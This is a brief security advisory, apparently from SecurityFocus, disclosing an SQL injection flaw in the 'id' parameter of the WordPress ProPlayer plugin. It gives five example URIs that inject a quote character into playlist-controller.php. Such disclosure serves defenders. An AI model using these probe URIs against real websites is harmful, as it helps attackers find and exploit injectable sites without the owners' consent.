WordPress ProPlayer Plugin 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27
http://www.example.com/en/fear-no-ground/wp-content/plugins/proplayer/playlist-controller.php?id=151-0%27
http://www.example.com/wp-content/plugins/proplayer/playlist-controller.php?id=42-0%27
http://www.example.com/wp-content/plugins/proplayer/playlist-controller.php?id=51-0%27
http://www.example.com/wp-content/plugins/proplayer/playlist-controller.php?id=750-0%27


 

Privacy Statement
Copyright 2010, SecurityFocus